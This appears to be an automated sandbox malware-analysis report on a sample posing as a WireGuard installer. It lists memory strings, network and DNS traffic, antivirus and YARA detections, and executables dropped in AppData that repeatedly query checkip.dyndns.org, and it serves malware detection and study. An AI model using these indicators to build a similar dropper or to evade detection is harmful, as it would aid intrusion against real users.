Source: wireguard.exe, 00000007.00000000.635889564.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000000.636854021.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637554175.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129407709.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe.4.dr	String found in binary or memory: https://www.wireguard.com/donations/key
Source: wireguard.exe, 00000007.00000000.635889564.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000000.636854021.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637554175.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129407709.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe.4.dr	String found in binary or memory: https://www.wireguard.com/initSpan:
Source: wireguard.exe, 00000007.00000000.636028833.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000002.639602430.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637652316.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 0000000A.00000002.1129667610.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.wireguard.net/D

Source: global traffic	HTTP traffic detected: GET /windows-client/latest.sig HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: WireGuard-Fetcher/1.0 (Windows 10.0.17134; amd64)Host: download.wireguard.com
Source: global traffic	HTTP traffic detected: GET /windows-client/wireguard-amd64-0.5.3.msi HTTP/1.1Connection: Keep-AliveUser-Agent: WireGuard-Fetcher/1.0 (Windows 10.0.17134; amd64)Host: download.wireguard.com
Source: global traffic	HTTP traffic detected: GET /windows-client/latest.sig HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: WireGuard/0.5.3 (Windows 10.0.17134; amd64)Host: download.wireguard.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive

Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Avira: detection malicious, Label: LNK/Runner.VPGD
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Avira: detection malicious, Label: LNK/Runner.VPGD

Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Joe Sandbox ML: detected

Source: Yara match	File source: 9.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.636854021.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.637554175.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.637369671.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.635889564.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.638265825.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1129407709.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1129430829.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.639295558.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wireguard.exe PID: 6736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wireguard.exe PID: 2200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wireguard.exe PID: 3068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wireguard.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files\WireGuard\wireguard.exe, type: DROPPED

Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49790 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.88.34:443 -> 192.168.2.4:49832 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.88.34:443 -> 192.168.2.4:49834 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.88.34:443 -> 192.168.2.4:49833 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49853 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49877 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49878 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49879 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49891 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49890 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49892 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49893 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49895 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49894 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49899 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49901 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49900 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49909 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49910 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49911 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.150.79:443 -> 192.168.2.4:49914 version: TLS 1.0

Source: C:\Windows\System32\msiexec.exe	File opened: z:
Source: C:\Windows\System32\msiexec.exe	File opened: x:
Source: C:\Windows\System32\msiexec.exe	File opened: v:
Source: C:\Windows\System32\msiexec.exe	File opened: t:
Source: C:\Windows\System32\msiexec.exe	File opened: r:
Source: C:\Windows\System32\msiexec.exe	File opened: p:
Source: C:\Windows\System32\msiexec.exe	File opened: n:
Source: C:\Windows\System32\msiexec.exe	File opened: l:
Source: C:\Windows\System32\msiexec.exe	File opened: j:
Source: C:\Windows\System32\msiexec.exe	File opened: h:
Source: C:\Windows\System32\msiexec.exe	File opened: f:
Source: C:\Windows\System32\msiexec.exe	File opened: b:
Source: C:\Windows\System32\msiexec.exe	File opened: y:
Source: C:\Windows\System32\msiexec.exe	File opened: w:
Source: C:\Windows\System32\msiexec.exe	File opened: u:
Source: C:\Windows\System32\msiexec.exe	File opened: s:
Source: C:\Windows\System32\msiexec.exe	File opened: q:
Source: C:\Windows\System32\msiexec.exe	File opened: o:
Source: C:\Windows\System32\msiexec.exe	File opened: m:
Source: C:\Windows\System32\msiexec.exe	File opened: k:
Source: C:\Windows\System32\msiexec.exe	File opened: i:
Source: C:\Windows\System32\msiexec.exe	File opened: g:
Source: C:\Windows\System32\msiexec.exe	File opened: e:
Source: C:\Program Files\WireGuard\wireguard.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	DNS query: name: checkip.dyndns.org

Source: Joe Sandbox View	JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: svchost.exe, 0000001C.00000003.798246562.000002034ADA6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.798258529.000002034ADC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.798231485.000002034ADB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2023-09-26T19:35:25.6085288Z\|\|.\|\|d4ee6f1b-8b08-4e5e-a5f7-e1f96ec7fa97\|\|1152921505696822571\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2023-09-26T19:35:02.9056134Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
Source: svchost.exe, 0000001C.00000002.815475929.000002034A4D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \nLike us on Facebook: http://www.facebook.com/spotify\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"Sear equals www.facebook.com (Facebook)
Source: svchost.exe, 0000001C.00000002.815475929.000002034A4D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \nLike us on Facebook: http://www.facebook.com/spotify\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"Sear equals www.twitter.com (Twitter)
Source: svchost.exe, 0000001C.00000003.804379264.000002034ADB5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.804379264.000002034ADAA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.804401759.000002034AD9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \nLike us on Facebook: http://www.facebook.com/spotify\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2023-09-28T14:59:04.8062288Z\|\|.\|\|eb62e02d-20c9-4824-acac-7aae5de5b617\|\|1152921505696820332\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":["HeadlessApp"],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"202
Source: svchost.exe, 0000001C.00000003.804379264.000002034ADB5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.804379264.000002034ADAA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000003.804401759.000002034AD9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \nLike us on Facebook: http://www.facebook.com/spotify\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2023-09-28T14:59:04.8062288Z\|\|.\|\|eb62e02d-20c9-4824-acac-7aae5de5b617\|\|1152921505696820332\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":["HeadlessApp"],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"202
